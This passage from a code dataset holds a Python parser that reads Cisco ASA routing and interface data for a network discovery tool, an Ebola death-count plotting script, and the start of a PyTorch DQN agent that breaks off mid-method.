None\n self._inventory = None\n self._hostName = None\n self._stackCount = 0\n self._logicalSystems = []\n self._routingInstances = {}\n self._runningRoutingProtocols = {} \n self.ScriptSettings = PGT.Common.SettingsManager.GetCurrentScriptSettings()\n self._ModelNumber = None\n self._SystemSerial = None \n self._operationStatusLabel = \"Idle\"\n self._ridCalculator.Reset()\n self._interfaceParser.Reset() \n \n def RoutedInterfaces(self, instance):\n \"\"\"Returns the RouterInterface object list for the requested routing instance\"\"\"\n return self._interfaceParser.GetAllInterfaces(instance)\n \n def RouterID(self, protocol, instance):\n \"\"\"Returns the router ID string for the requested protocol and routing intance\"\"\"\n return self._ridCalculator.GetRouterID(protocol, instance)\n \n def RoutingInstances(self, logicalSystemName):\n \"\"\"Returns the list of RoutingInstance objects for the VRFs running on the requested logical system (VDC)\"\"\"\n if not logicalSystemName : \n logicalSystemName = \"Default\"\n if self._routingInstances.get(logicalSystemName, None) == None : \n self._routingInstances[logicalSystemName] = []\n 
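# the per-logical-system list of routing instances is populated lazily on first access\n 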
\n if len(self._routingInstances[logicalSystemName]) == 0:\n instances = []\n # ASA does not natively support VRFs, so add the default (global) instance only\n defInstance = L3Discovery.RoutingInstance()\n defInstance.LogicalSystemName = logicalSystemName\n defInstance.DeviceVendor = \"Cisco\"\n defInstance.Name = self._defaultRoutingInstanceName\n instances.append(defInstance)\n self._routingInstances[logicalSystemName] = instances\n \n result = self._routingInstances[logicalSystemName]\n return result\n \n def RouteTableSize(self, instance):\n \"\"\"Returns the size of the route table for the requested routing instance\"\"\"\n instanceName = self._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n routeTableSize = -1\n try :\n cmd = \"show route summary\"\n \n routeSummary = Session.ExecCommand(cmd) \n routeTotals = filter(lambda s: s.startswith(\"Total\"), routeSummary.splitlines())\n \n if len(routeTotals) > 0:\n # return the last number in Total line\n words = filter(None, routeTotals[0].split(' '))\n routeTableSize = int(words[2])\n except Exception as Ex :\n DebugEx.WriteLine(\"CiscoASA : error calculating route table size : {0}\".format(str(Ex)))\n \n return routeTableSize\n \n def RoutingTable(self, instance):\n \"\"\"Returns the list of RouteTableEntry objects for requested RoutingInstance\"\"\"\n parsedRoutes = []\n try:\n if instance : \n instanceName = instance.Name\n # get route table size\n routeTableSize = self.RouteTableSize(instance)\n if routeTableSize > self._maxRouteTableEntries :\n # query only default route \n cmd = \"show route 0.0.0.0\"\n else:\n # query inet.0 route table for the requested instance\n cmd = \"show route\"\n routes = Session.ExecCommand(cmd)\n \n thisProtocol = NeighborProtocol.UNKNOWN\n expectingNextHop = False\n prefix = \"\"\n maskLength = -1\n subnettedPrefix = \"\"\n subnettedMaskLength = -1\n nextHop = \"\"\n adminDistance = \"\"\n routeMetric = \"\"\n parserSuccess = False\n outInterface = \"\"\n for rLine in [line.strip() for line in routes.splitlines()]:\n if \"subnetted\" in rLine:\n # lets check if we find an ipAddress subnetMask combination in the line\n m = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\\/\\d{1,2}\", rLine)\n if len(m) == 1 :\n prefixAndMask = m[0].split('/')\n if len(prefixAndMask) == 2 :\n subnettedPrefix = prefixAndMask[0]\n # proceed to next rLine\n continue\n if rLine.startswith(\"B\") :\n thisProtocol = NeighborProtocol.BGP\n expectingNextHop = False\n elif rLine.startswith(\"O\") or rLine.startswith(\"IA\") or rLine.startswith(\"N1\") or rLine.startswith(\"N2\") or rLine.startswith(\"E1\") or rLine.startswith(\"E2\") :\n thisProtocol = NeighborProtocol.OSPF\n expectingNextHop = False\n elif rLine.startswith(\"D\") or rLine.startswith(\"EX\") :\n thisProtocol = NeighborProtocol.EIGRP;\n expectingNextHop = False;\n elif rLine.startswith(\"R\") :\n thisProtocol = NeighborProtocol.RIP\n expectingNextHop = False\n elif rLine.startswith(\"L\") :\n thisProtocol = NeighborProtocol.LOCAL\n expectingNextHop = False\n elif rLine.startswith(\"C\") :\n thisProtocol = NeighborProtocol.CONNECTED\n expectingNextHop = False\n elif rLine.startswith(\"S\") :\n thisProtocol = NeighborProtocol.STATIC\n expectingNextHop = False\n elif rLine.startswith(\"[\") and expectingNextHop : pass\n else :\n thisProtocol = NeighborProtocol.UNKNOWN\n expectingNextHop = False\n # reset variables if current line is not a continuation\n if not expectingNextHop :\n prefix = \"\"\n maskLength = -1\n nextHop = 
\"\"\n adminDistance = \"\"\n routeMetric = \"\"\n parserSuccess = False\n outInterface = \"\"\n \n if thisProtocol != NeighborProtocol.UNKNOWN :\n if thisProtocol == NeighborProtocol.LOCAL or thisProtocol == NeighborProtocol.CONNECTED :\n # we expect an ip addresses-subnet mask pair in these lines\n prefixAndMask = GetIPAddressAndSubnetMaskFromLine(rLine)\n if prefixAndMask:\n prefix = prefixAndMask[0]\n maskLength = int(IPOperations.GetMaskLength(prefixAndMask[1]))\n # this line should also contain the out interface as the last word\n words = filter(None, rLine.split(','))\n asaNameif = words[-1]\n oif = self._interfaceParser.GetInterfaceByASANameIf(asaNameif, instance)\n if oif : outInterface = oif.Name\n else : outInterface = asaNameif\n expectingNextHop = False\n parserSuccess = True\n else:\n if not expectingNextHop:\n # we expect an ip addresses-subnet mask pair in these lines, and also a next-hop \n prefixAndMask = GetIPAddressAndSubnetMaskFromLine(rLine)\n if prefixAndMask:\n prefix = prefixAndMask[0]\n maskLength = int(IPOperations.GetMaskLength(prefixAndMask[1]))\n expectingNextHop = True \n \n if expectingNextHop:\n # get next-hop\n m = re.findall(R\"(?<=via )\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\", rLine)\n if len(m) == 1 :\n expectingNextHop = False\n parserSuccess = True\n nextHop = m[0]\n # get preference\n m = re.findall(r\"\\[(.*?)\\]\", rLine)\n if len(m) == 1 :\n preferences = filter(None, m[0].split('/'))\n adminDistance = preferences[0].strip('[')\n routeMetric = preferences[1].strip(']')\n # this line should also contain the out interface\n words = rLine.split(',')\n if len(words) > 1 : \n asaNameif = words[-1]\n oif = self._interfaceParser.GetInterfaceByASANameIf(asaNameif, instance)\n if oif : outInterface = oif.Name\n else : outInterface = asaNameif\n else:\n # only for debugging\n expectingNextHop = True \n \n if parserSuccess:\n try:\n rte = L3Discovery.RouteTableEntry()\n rte.RouterID = self.RouterID(thisProtocol, instance)\n rte.Prefix = prefix\n rte.MaskLength = maskLength\n rte.Protocol = str(thisProtocol)\n rte.AD = adminDistance\n rte.Metric = routeMetric\n rte.NextHop = nextHop\n rte.OutInterface = outInterface\n rte.Best = True # the show ip route output only lists best routes :-(\n rte.Tag = \"\"\n parsedRoutes.Add(rte)\n except Exception as Ex :\n msg = \"CiscoASA.RoutingTable() : error processing route table : {0}\".format(str(Ex))\n DebugEx.WriteLine(msg)\n \n except Exception as Ex:\n msg = \"CiscoASA.RoutingTable() :unexpected error while processing route table : {0}\".format(str(Ex))\n DebugEx.WriteLine(msg)\n raise Exception(msg)\n \n return parsedRoutes\n \nclass RouterIDCalculator():\n \"\"\"Performs Router ID and AS Number calculations \"\"\"\n def __init__(self, router):\n # self.Router will hold a reference to the parent CiscoASA instance\n self.Router = router\n # RouterID is a dictionary in dictionary, outer keyed by RoutingInstance name, inner keyed by RoutingProtocol as a string\n self.RouterID = {}\n # BGPASNumber is a dictionary, keyed by RoutingInstance name\n self.BGPASNumber = {} \n \n def GetRouterID(self, protocol, instance):\n \"\"\"Return the RouterID for given instance and protocol\"\"\"\n rid = \"\"\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if len(self.RouterID.get(instanceName, {})) == 0 : self.CalculateRouterIDAndASNumber(instance)\n instanceRIDs = self.RouterID.get(instanceName, None)\n if instanceRIDs :\n rid = instanceRIDs.get(str(protocol), \"\")\n 
return rid\n \n def GetBGPASNumber(self, instance):\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if len(self.BGPASNumber) == 0 : \n self.CalculateRouterIDAndASNumber(instance)\n return self.BGPASNumber.get(instanceName, \"\")\n \n def CalculateRouterIDAndASNumber(self, instance):\n \"\"\"Parse the RouterID and AS number for the requested RoutingInstance\"\"\" \n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.RouterID.get(instanceName, None) == None: self.RouterID[instanceName] = {}\n \n # Determine default router ID\n globalRouterID = ConnectionInfo.DeviceIP\n l3interfaces = Session.ExecCommand(\"sh interface ip brief\")\n if l3interfaces:\n try :\n loopbacks = [intf.lower() for intf in l3interfaces.splitlines() if intf.lower().startswith(\"loopback\") and GetIPAddressFromLine(intf)]\n if len(loopbacks) > 0 :\n # find the loopback with lowest number\n lowestLoopback = sorted(loopbacks, key=lambda i: int(i[8:10]))[0]\n if lowestLoopback:\n globalRouterID = lowestLoopback.split()[1]\n else:\n # no loopbacks, find the interface with highest ip address\n highestIPLine = (sorted(l3interfaces.splitlines(), key=lambda i: IP2Int(GetIPAddressFromLine(i)))[-1]).strip()\n if highestIPLine:\n globalRouterID = GetIPAddressFromLine(highestIPLine)\n except Exception as Ex :\n DebugEx.WriteLine(\"CiscoASA.CalculateRouterIDAndASNumber() : error while parsing interface information : \" + str(Ex))\n \n \n # get the running routing protocols for this routing instance\n runnintRoutingProtocols = self.Router.ActiveProtocols(instance)\n for thisProtocol in runnintRoutingProtocols: \n if thisProtocol == L3Discovery.NeighborProtocol.BGP:\n # construct CLI command\n cmd = \"show bgp summary\"\n \n bgpSummary = Session.ExecCommand(cmd)\n match = re.findall(r\"(?<=BGP router identifier )[\\d.]{0,99}\", bgpSummary, re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n \n # get also the BGP AS number\n match = re.findall(r\"(?<=local AS number )[\\d.]{0,99}\", bgpSummary, re.IGNORECASE) \n if len(match) == 1 :\n self.BGPASNumber[instanceName] = match[0]\n \n elif thisProtocol == L3Discovery.NeighborProtocol.OSPF:\n cmd = \"show ospf | i ID\"\n ospfGeneral = Session.ExecCommand(cmd)\n # expecting output like this:\n\t\t\t # Routing Process \"ospf 200\" with ID 10.9.254.251\n\t\t\t\t# Routing Process \"ospf 100\" with ID 192.168.1.1\n #\n # WARNING if more than one EIGRP process is running, generate error\n # \n if len(ospfGeneral.splitlines()) == 1 :\n match = re.findall(r\"(?<=ID )[\\d.]{0,99}\", ospfGeneral, re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n else:\n raise ValueError(\"Parsing more than one OSPF process is not supported by parser\")\n \n elif thisProtocol == L3Discovery.NeighborProtocol.EIGRP :\n cmd = \"show eigrp topology | i ID\"\n eigrpGeneral = Session.ExecCommand(cmd)\n # expecting output like this:\n # IP - EIGRP Topology Table for AS(10) / ID(10.9.240.1)\n # IP - EIGRP Topology Table for AS(20) / ID(10.9.240.1)\n #\n # TODO :\n # WARNING if more than one EIGRP process is running, generate error\n # \n if len(eigrpGeneral.splitlines()) == 1 :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", eigrpGeneral, 
re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n else:\n raise ValueError(\"Parsing more than one EIGRP process is not supportedby parser\") \n \n elif thisProtocol == L3Discovery.NeighborProtocol.CDP:\n # only for default (global) routing instance\n if instanceName == self.Router._defaultRoutingInstanceName :\n self.RouterID[instanceName][str(thisProtocol)] = self.Router.GetHostName()\n \n elif thisProtocol == L3Discovery.NeighborProtocol.RIP:\n # always use global router-id\n # TODO : this may require tuning\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n \n elif thisProtocol == L3Discovery.NeighborProtocol.STATIC: \n # always use global router-id\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n elif thisProtocol == L3Discovery.NeighborProtocol.IPSEC: \n # Always use global router-id for IPSEC. \n # From networking perspective this is not meaningful but is rather a requirement of NetworkDiscoveryEngine\n # to associate a routerID for each neighbor protocol that is being discoverd.\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n else :\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n \n def Reset(self):\n self.RouterID = {}\n self.BGPASNumber = {}\n \nclass InterfaceParser(): \n \"\"\"Manage Cisco interfaces\"\"\"\n def __init__(self, router):\n # self.Router will hold a reference to the parent CiscoASA instance\n self.Router = router\n # These are the list of interfaces collected by ParseInterfaces() method. \n # A dictionary, keyed by routing instance name and containing Lists\n self.Interfaces = {}\n # Interface config cache. \n # A dictionary keyed by Interface Name and containing strings\n self._interfaceConfigurations = {}\n # The running configuration of router\n self._running_config = None\n # A dictionary to map interface names to ASA nameif properties\n self._ifNames = {}\n # A dictionary to map ASA nameif properties to interface names\n self._nameIfs = {}\n \n def ParseInterfaces(self, instance) :\n \"\"\"Collects interface details for all interfaces of specified routing instance, but do not collect interface configuration \"\"\"\n # Get the interfaces configurations\n if len(self._interfaceConfigurations) == 0 : self.ParseInterfaceConfigurations()\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # Query the device interfaces\n interfaces = Session.ExecCommand(\"show interface summary\").splitlines()\n # Parse the result and fill up self.Interfaces list\n ri = L3Discovery.RouterInterface()\n lineCount = len(interfaces)\n currentLineIndex = 1\n for line in interfaces:\n try: \n if line.lower().startswith(\"interface\") or currentLineIndex == lineCount :\n # this is either a new interface block, or the end of the interface list\n if ri and ri.Name :\n # Add actual interface if vrf name matches instanceName\n if not ri.VRFName and instanceName == self.Router._defaultRoutingInstanceName or ri.VRFName == instanceName:\n ri.Configuration = self.GetInterfaceConfiguration(ri.Name)\n if ri.Configuration.find(\"vlan \") >= 0 : \n ri.PortMode = L3Discovery.RouterInterfacePortMode.L3Subinterface\n subinterfaceDefinition = next((cline for cline in ri.Configuration.splitlines() if 
cline.startswith(\"vlan \")), \"\")\n ri.VLANS = subinterfaceDefinition.split(' ')[-1]\n elif ri.Address : ri.PortMode = L3Discovery.RouterInterfacePortMode.Routed\n else : ri.PortMode = L3Discovery.RouterInterfacePortMode.Unknown\n ri.Description = next((cline for cline in ri.Configuration.splitlines() if cline.startswith(\"description\")), \"\")\n self.Interfaces[instanceName].Add(ri) \n if currentLineIndex == lineCount :\n break\n words = filter(None, line.split(' '))\n interfaceName = words[1]\n if self.IsInterrestingInterface(interfaceName):\n # Create new interface \n ri = L3Discovery.RouterInterface()\n # words should look like : Interface,GigabitEthernet0/0,\"outside\",is,up,line,protocol,is,up\n ri.LogicalSystemName = \"Default\" \n ri.Name = interfaceName\n status = [i.strip(',') for i in words if \"up\" in i.lower() or \"down\" in i.lower()]\n ri.Status = \",\".join(status)\n else:\n # this line belongs to an iterface information block\n sline = line.strip().lower()\n if sline.startswith(\"ip address\"):\n addressAndMask = GetIPAddressAndSubnetMaskFromLine(sline)\n if len(addressAndMask) == 2:\n ri.Address = addressAndMask[0]\n ri.MaskLength = str(IPOperations.GetMaskLength(addressAndMask[1]))\n \n # PortMode and VLANS will be processed later in a second pass\n except Exception as Ex:\n DebugEx.WriteLine(\"CiscoASA.InterfaceParser.ParseInterfaces() : error parsing text {0}. Error is {1}\".format(line, str(Ex)))\n \n currentLineIndex += 1\n \n def GetRoutedInterfaces(self, instance):\n \"\"\" Return the list of RouterInterfaces that have a valid IPAddress\"\"\"\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : \n self.ParseInterfaces(instance)\n routedInterfaces = filter(lambda x: x.Address, self.Interfaces[instanceName])\n return routedInterfaces\n \n def GetAllInterfaces(self, instance):\n \"\"\" Return the list of device interfaces\"\"\"\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n return self.Interfaces[instanceName]\n \n def GetInterfaceByASANameIf(self, asaNameif, instance):\n \"\"\"Returns a RouterInterface object for the interface specified by its ASA nameif property\"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n # map ASA namif to interface name\n ifName = self._nameIfs.get(asaNameif.strip(), None)\n if ifName:\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Name == ifName), None)\n return foundInterface \n \n def GetInterfaceByName(self, ifName, instance):\n \"\"\"Returns a RouterInterface object for the interface specified by its name\"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n 
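# use the caller-supplied routing instance name when one is given\n 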
if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Name == ifName.strip()), None)\n return foundInterface\n \n def GetInterfaceNameByAddress(self, ipAddress, instance):\n \"\"\" Returns a RouterInterface object for the interface specified by its ip address \"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n ifName = \"\"\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Address == ipAddress), None)\n if foundInterface != None:\n ifName = foundInterface.Name\n return ifName \n \n def GetInterfaceConfiguration(self, ifName):\n \"\"\" Return the configuration of an interface \"\"\"\n if len(self._interfaceConfigurations) == 0 : self.ParseInterfaceConfigurations()\n # Use interface name without unit name to get full configuration\n # intfName = re.sub(r\"\\.\\d+$\", \"\", ifName)\n ifConfig = self._interfaceConfigurations.get(ifName, \"\")\n return ifConfig \n \n def ParseInterfaceConfigurations(self):\n \"\"\"Gets router running configurtion to collect interface configurations\"\"\" \n # Get running configuration to parse\n if not self._running_config:\n self._running_config = Session.ExecCommand(\"show running-config interface\")\n if len(self._running_config) < 100 and \"Command authorization failed\" in self._running_config:\n # some systems may not allow running \"show run\" but still allow \"show tech\", let's give a try :-)\n tech_support_ipc = Session.ExecCommand(\"show tech-support\")\n temp_running_config = []\n riBlock = False\n for line in tech_support_ipc.splitlines():\n if riBlock:\n if line.find(\"--- show\") > 0:\n # end of running configuration block\n break\n temp_running_config.append(line)\n else:\n if line.find(\"--- show running-config ---\") > 0:\n # start of running configuration block\n riBlock = True\n self._running_config = \"\\r\\n\".join(temp_running_config)\n \n self._interfaceConfigurations = {}\n self._ifNames = {}\n self._nameIfs = {}\n currentIntfName = \"\"\n currentIntfConfig = []\n for thisLine in self._running_config.splitlines():\n try:\n words = thisLine.split(\" \")\n if thisLine.startswith(\"interface\") and len(words) == 2 :\n # This should be a new interface definition\n if currentIntfName != \"\":\n # add previous interface\n self._interfaceConfigurations[currentIntfName] = \"\\r\\n\".join(currentIntfConfig)\n # Clear current configuration\n currentIntfConfig = []\n currentIntfName = words[1]\n else:\n sline = thisLine.strip(' ')\n if sline != \"!\" :\n currentIntfConfig.append(sline)\n # region memorize ASA nameif properties\n m = re.findall(r\"(?<=nameif ).*\", sline)\n if len(m) == 1:\n nameif = m[0].strip()\n self._ifNames[currentIntfName] = nameif\n self._nameIfs[nameif] = currentIntfName\n \n except Exception as Ex:\n message = \"CiscoASA.InterfaceParser.ParseInterfaceConfigurations() : could not parse an interface configuration for line <{0}>. 
Error is : {1} \".format(thisLine, str(Ex))\n DebugEx.WriteLine(message) \n \n def IsInterrestingInterface(self, intfName):\n \"\"\" Determines if a given name is an interface name we want to parse\"\"\"\n iname = intfName.lower()\n return iname.startswith(\"fastethernet\") or iname.startswith(\"gigabitethernet\") or iname.startswith(\"tengigabitethernet\") or iname.startswith(\"ethernet\") or iname.startswith(\"loopback\") or iname.startswith(\"vlan\") or iname.startswith(\"tunnel\")\n \n def Reset(self) :\n self.Interfaces = {}\n self._interfaceConfigurations = {}\n self._running_config = None\n \n def InterfaceNameToShort(self, longName):\n \"\"\"Converts a long Cisco interface name to its short representation\"\"\"\n inputName = longName.lower()\n shortName = \"\"\n if inputName.startswith(\"fastethernet\") : shortName = inputName.replace(\"fastethernet\", \"fa\")\n elif inputName.startswith(\"tengigabitethernet\") : shortName = inputName.replace(\"tengigabitethernet\", \"te\")\n elif inputName.startswith(\"gigabitethernet\") : shortName = inputName.replace(\"gigabitethernet\", \"gi\")\n elif inputName.startswith(\"ethernet\") : shortName = inputName.replace(\"ethernet\", \"eth\")\n elif inputName.startswith(\"loopback\") : shortName = inputName.replace(\"loopback\", \"lo\")\n return shortName \n \n def InterfaceNameToLong(self, shortName):\n \"\"\"Converts a short Cisco interface name to its long representation\"\"\"\n inputName = shortName.lower()\n longName = \"\"\n if inputName.startswith(\"fa\") and inputName.find(\"fastethernet\") < 0 : longName = inputName.replace(\"fa\", \"fastethernet\")\n elif inputName.startswith(\"te\") and inputName.find(\"tengigabitethernet\") < 0 : longName = inputName.replace(\"te\", \"tengigabitethernet\")\n elif inputName.startswith(\"gi\") and inputName.find(\"gigabitethernet\") < 0 : longName = inputName.replace(\"gi\", \"gigabitethernet\")\n elif inputName.startswith(\"eth\") and inputName.find(\"ethernet\") < 0 : longName = inputName.replace(\"eth\", \"ethernet\")\n elif inputName.startswith(\"lo\") and inputName.find(\"loopback\") < 0 : longName = inputName.replace(\"lo\", \"loopback\")\n return longName\n \n \ndef GetColumnValue(textLine, headerLine, headerColumn, headerSeparator):\n \"\"\"Returns the substring from textLine in column determined by the position of headerColumn in headerLine\"\"\"\n headerColumnNames = map(lambda i: i.strip(), filter(None, headerLine.split(headerSeparator)))\n headerCount = len(headerColumnNames)\n requestedColumnIndex = headerColumnNames.index(headerColumn)\n nextColumnName = \"\"\n try:\n nextColumnName = headerColumnNames[ requestedColumnIndex + 1 ]\n except:\n pass\n s = headerLine.index(headerColumn)\n e = len(textLine)\n if nextColumnName : e = headerLine.index(nextColumnName)\n return textLine[s:e].strip() \n \ndef IP2Int(ip):\n \"\"\"Converts a string literal ip address to its integer value\"\"\"\n try:\n if not ip:\n return -1\n o = map(int, ip.split('.'))\n res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]\n return res \n except:\n return -1\n \ndef GetIPAddressFromLine(line):\n \"\"\"Extracts the first IP address match from a line of text and returns it\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n address = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(address) == 1 : \n return address[0]\n else: \n return \"\" \n \ndef GetIndexedIPAddressFromLine(line, index):\n \"\"\"Extracts the indexed IP address match from a line of text and returns it. 
Index is 1 based.\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n addresses = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(addresses) >= index : \n return addresses[index-1]\n else: \n return \"\" \n \ndef GetIPAddressAndSubnetMaskFromLine(line):\n \"\"\"Extracts the first and second IP address match from a line of text and returns them\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n addresses = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(addresses) >= 2 : \n return [addresses[0], addresses[1]]\n else: \n return \"\" \n \ndef GetIPAddressAndMaskFromLine(line):\n \"\"\"Extracts the first match of an IP address and mask from a line of text and returns it\n Expected format is aaa.bbb.ccc.ddd\/xx\"\"\"\n address = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\/\\d{1,2}\", line)\n if len(address) == 1 : \n return address[0]\n else: \n return \"\"\n \ndef GetRegexGroupMatches(pattern, text, groupNum):\n \"\"\"Returns the list of values of the specified Regex group number for all matches. Returns None if there is no match or the group number does not exist\"\"\"\n try:\n result = []\n mi = re.finditer(pattern, text, re.MULTILINE)\n for matchnum, match in enumerate(mi):\n # collect the requested group value from each match\n result.append(match.group(groupNum))\n return result\n except :\n return None\n \n################### Script entry point ###################\nif ConnectionInfo.Command == \"CreateInstance\":\n ActionResult = CiscoASA()\n ScriptSuccess = True\n ","sub_path":"CiscoASA.py","file_name":"CiscoASA.py","file_ext":"py","file_size_in_byte":43196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498967761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017/11/30 6:44\n\nEbola case study: cumulative number of confirmed, probable and suspected Ebola deaths\n\nData source: ebola_data_db_format.csv\n\nLine chart\n\nhttps://ds-ec2.scraperwiki.com/g7nnqgn/ckm9nsfssakeuor/cgi-bin/csv/ebola_data_db_format.csv\n\n@author: wangdongsong1229@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport csv\nimport operator\nimport datetime as dt\nimport os\n\nbasePath = os.path.abspath(\"..\")\ndataFilePath = basePath + \"/resources/ebola_data_db_format.csv\"\nkey = \"Cumulative number of confirmed, probable and suspected Ebola deaths\"\n\nwith open(dataFilePath, \"rt\") as f:\n filterdata = [row for row in csv.reader(f) if row[3] != \"0.0\" and row[3] != \"0\" and \"deaths\" in row[0] and row[2][0:4] == \"2014\"]\n\n sorteddata = sorted(filterdata, key=operator.itemgetter(1))\n guineadata = [row for row in sorteddata if row[1] == \"Guinea\" and row[0] == key]\n sierradata = [row for row in sorteddata if row[1] == \"Sierra Leone\" and row[0] == key]\n liberiadata = [row for row in sorteddata if row[1] == \"Liberia\" and row[0] == key]\n\n g_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in guineadata]\n g_y = [row[3] for row in guineadata]\n\n s_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in sierradata]\n s_y = [row[3] for row in sierradata]\n\n l_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in liberiadata]\n l_y = [row[3] for row in liberiadata]\n\n plt.figure(figsize=(10, 10))\n plt.plot(g_x, g_y, color=\"red\", linewidth=2, label=\"Guinea\")\n plt.plot(s_x, s_y, color=\"orange\", linewidth=2, label=\"Sierra Leone\")\n plt.plot(l_x, l_y, color=\"blue\", linewidth=2, label=\"Liberia\")\n\n plt.xlabel(\"Date\", fontsize=18)\n\n plt.ylabel(\"Number of Ebola Deaths\", fontsize=18)\n\n plt.title(\"Confirmed Ebola Deaths\", fontsize=20)\n\n 
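# loc=2 places the legend in the upper-left corner of the axes\n 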
plt.legend(loc=2)\n\n plt.show()\n","sub_path":"com/wds/data_visualization/visualization/ebola2.py","file_name":"ebola2.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"465225305","text":"import math\nimport random\n\nimport numpy as np\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom models.agents.agent import Agent\nfrom models.agents.replaybuffer import ReplayBuffer\n\n\"\"\"\nDeep Q Network\nhttps://www.cs.toronto.edu/%7Evmnih/docs/dqn.pdf\n\nThis implementation uses a lazy initialization of the DQN as I wanted to keep it general enough to fit different \nstate vector lengths. However, future Agents, such as the DuelingAgent do not do this, as I intended to set the\nstate vector length to the maximum.\n\nhttps://github.com/higgsfield/RL-Adventure/blob/master/1.dqn.ipynb\nWritten before Variable was deprecated, but I couldn't fully convert it to only Tensors without errors\n\"\"\"\n\n\nclass DQN(nn.Module):\n def __init__(self, num_inputs, num_actions, hidden_size, device):\n super(DQN, self).__init__()\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n\n self.device = device\n\n self.layers = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ELU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(),\n nn.Linear(hidden_size, num_actions)\n ).to(device)\n\n def forward(self, x):\n return self.layers(x)\n\n def act(self, state, epsilon):\n if random.random() > epsilon:\n state = autograd.Variable(torch.FloatTensor(state).unsqueeze(0)).to(self.device)\n q_value = self.forward(state)\n action = q_value.max(1)[1].data[0]\n\n else:\n action = random.randrange(self.num_actions)\n return action\n\n\nclass DQNAgent(Agent):\n def __init__(self, hidden=128):\n super(DQNAgent, self).__init__()\n # Set hyperparameters\n self.gamma = 0.99\n self.epsilon_start = 1\n self.epsilon_end = 0.01\n self.epsilon_decay = 500\n self.batch_size = 32\n self.epsilon_by_frame = lambda step: self.epsilon_end + (self.epsilon_start - self.epsilon_end) *\\\n math.exp(-1. * step / self.epsilon_decay)\n self.frame = 0\n\n self.model = None\n self.hidden_size = hidden\n self.optimizer = None\n self.replay = ReplayBuffer(1000)\n self.prev_info = None # Previous state\n\n self.prev_prev = None # Previous previous, for replay buffer\n self.action = None # Action for replay buffer\n\n self.losses = []\n # Set CUDA\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Not really sure how python inheritance works, so re-declaring so that PyCharm doesn't complain\n self.choices = 3\n self.prev_rwd = 0\n self.cum_rewards = []\n\n def choose(self, information):\n # 